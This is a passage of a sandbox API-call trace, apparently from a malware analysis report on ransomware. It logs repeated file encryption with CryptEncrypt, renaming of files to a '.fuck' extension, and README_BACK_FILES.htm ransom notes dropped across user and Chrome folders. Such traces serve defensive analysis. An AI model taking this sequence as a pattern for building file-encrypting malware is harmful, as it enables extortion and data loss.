hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.230] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.230] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.231] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.231] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.232] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.232] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.232] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.232] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.232] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.233] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.233] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.233] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.233] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.233] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.233] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.233] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.233] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.234] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.234] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.234] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.234] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.234] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.234] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.235] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.235] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.235] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.235] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.235] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.236] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.236] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.488] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log"), bFailIfExists=0) returned 1 [0246.951] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log", dwFileAttributes=0x0) returned 1 [0246.951] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log.gsg")) returned 1 [0246.952] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\usstmp.log.fuck")) returned 1 [0246.953] CryptDestroyHash (hHash=0x28e7978) returned 1 [0246.953] CryptDestroyKey (hKey=0x28e7df8) returned 1 [0246.953] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0246.953] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0246.953] FindClose (in: hFindFile=0x28bf1d8 | out: hFindFile=0x28bf1d8) returned 1 [0246.953] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\readme_back_files.htm")) returned 0xffffffff [0246.954] AreFileApisANSI () returned 1 [0246.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f69a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0246.954] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0246.954] GetFileType (hFile=0x5d14) returned 0x1 [0246.954] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0246.955] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0246.955] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0246.955] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\readme_back_files.htm")) returned 0xffffffff [0246.956] AreFileApisANSI () returned 1 [0246.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6ab0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0246.956] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0246.957] GetFileType (hFile=0x5d10) returned 0x1 [0246.957] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0246.959] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0246.959] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2938838 [0246.961] FindNextFileA (in: hFindFile=0x2938838, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0246.961] FindNextFileA (in: hFindFile=0x2938838, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0246.961] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x29383f8 [0246.961] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0246.961] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0246.961] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2938378 [0246.977] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0246.978] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0246.978] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x29388f8 [0246.979] FindNextFileA (in: hFindFile=0x29388f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0246.979] FindNextFileA (in: hFindFile=0x29388f8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0246.979] FindClose (in: hFindFile=0x29388f8 | out: hFindFile=0x29388f8) returned 1 [0246.980] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\readme_back_files.htm")) returned 0xffffffff [0246.980] AreFileApisANSI () returned 1 [0246.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0246.980] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\certificatetransparency\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0246.981] GetFileType (hFile=0x5d44) returned 0x1 [0246.981] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0246.982] FindNextFileA (in: hFindFile=0x2938378, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0246.982] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x29389b8 [0246.986] FindNextFileA (in: hFindFile=0x29389b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0246.986] FindNextFileA (in: hFindFile=0x29389b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0246.986] FindNextFileA (in: hFindFile=0x29389b8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0246.986] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*", lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0x29388f8 [0246.987] FindNextFileA (in: hFindFile=0x29388f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0246.987] FindNextFileA (in: hFindFile=0x29388f8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 0 [0246.987] FindClose (in: hFindFile=0x29388f8 | out: hFindFile=0x29388f8) returned 1 [0246.988] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\reports\\readme_back_files.htm")) returned 0xffffffff [0246.988] AreFileApisANSI () returned 1 [0246.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0246.988] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\crashpad\\reports\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9dd3c, dwCreationDisposition=0x2, 